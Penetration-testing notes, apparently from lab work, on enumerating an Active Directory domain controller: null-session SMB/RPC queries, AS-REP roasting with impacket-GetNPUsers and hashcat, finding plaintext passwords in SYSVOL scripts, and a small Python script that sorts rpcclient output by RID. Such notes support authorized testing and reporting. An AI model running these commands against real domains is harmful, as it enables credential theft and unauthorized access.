Enum4linux
Pull a lot of information out of the Domain Controller using enum4linux
enum4linux 10.10.10.161
Password Policy enumeration
crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol
Put in the report that null authentication allows for domain enumeration
RPCClient
rpcclient -U '' 10.10.10.161
enumdomusers
queryusergroups [rid]
queryuser [rid]
querygroup [rid]
GetNPUsers
Queries the target domain for users with 'Do not require Kerberos preauthentication' set and requests their AS-REP hashes (the encrypted part of the TGT response) in a format ready for offline cracking
impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcat
hashcat --example-hashes | grep -i krb
hashcat --example-hashes | less
Credentials inside SYSVOL
Credentials may be stored inside a script in the SYSVOL share of the domain controller. This is most common in older AD environments.
Anyone with domain credentials can read SYSVOL. LAPS is now used to set local admin passwords instead of Group Policy scripts.
dir \\conda.local\SYSVOL\conda.local
Example path: \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
C:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
$computer=$env:computername
$user = "Administrator"
$Password = "DefaultAdminPass1!"
$user = [adsi]"WinNT://$computer/$user,user"
$user.SetPassword($Password)
net user administrator /active:yes
SMB and RPC Null Authentication
smbclient -L \\\\10.10.10.100\\ -U '' -N
rpcclient -U '' -N 10.10.10.169
Notes
If the RID (the last component of the SID) of a group or user is 1000 or above, it is not a default Windows object but was created by an administrator; built-in objects use well-known RIDs below 1000 (for example 500 for Administrator, 512 for Domain Admins)
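Added example (not part of these notes): a small Python triage script for the rpcclient enumdomusers/enumdomgroups output above. It decodes the hex RIDs rpcclient prints, separates created accounts and groups from Windows defaults using the 1000 boundary from the note, and flags a default whose name was changed (RID 500 is the built-in Administrator whatever it is called). The sample output, names and RIDs are constructed.

```python
import re
from dataclasses import dataclass
# Well-known RIDs every domain has (subset); created objects get RIDs from 1000 upward.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt", 512: "Domain Admins",
                   513: "Domain Users", 515: "Domain Computers", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}
FIRST_CREATED_RID = 1000
# Shape of the lines enumdomusers / enumdomgroups print, e.g. "user:[Guest] rid:[0x1f5]".
_LINE_RE = re.compile(r"^(?P<kind>user|group):\[(?P<name>[^\]]+)\]\s+rid:\[0x(?P<rid>[0-9a-fA-F]+)\]")
@dataclass
class DomainObject:
    kind: str  # "user" or "group"
    name: str
    rid: int   # decoded from the hex value rpcclient prints

    @property
    def created(self) -> bool:  # True when not a Windows default but created in this domain
        return self.rid >= FIRST_CREATED_RID

def parse_rpcclient(output: str) -> list[DomainObject]:
    """Parse enumdomusers/enumdomgroups output; lines of any other shape are ignored."""
    objects = []
    for line in output.splitlines():
        m = _LINE_RE.match(line.strip())
        if m:
            objects.append(DomainObject(m["kind"], m["name"], int(m["rid"], 16)))
    return objects

def triage(output: str) -> dict[str, list[str]]:
    """Split objects into created ones and defaults; a renamed default (e.g. RID 500) is still spotted by RID."""
    result: dict[str, list[str]] = {"created": [], "default": []}
    for o in parse_rpcclient(output):
        if o.created:
            result["created"].append(o.name)
        else:
            known = WELL_KNOWN_RIDS.get(o.rid)
            note = f" (renamed {known})" if known and known != o.name else ""
            result["default"].append(o.name + note)
    return result

# Constructed sample of rpcclient output (not captured from a real domain controller).
SAMPLE = """\
user:[dcadmin] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[svc-backup] rid:[0x451]
group:[Domain Admins] rid:[0x200]
group:[Helpdesk] rid:[0x44d]
"""
if __name__ == "__main__":
    print(triage(SAMPLE))
```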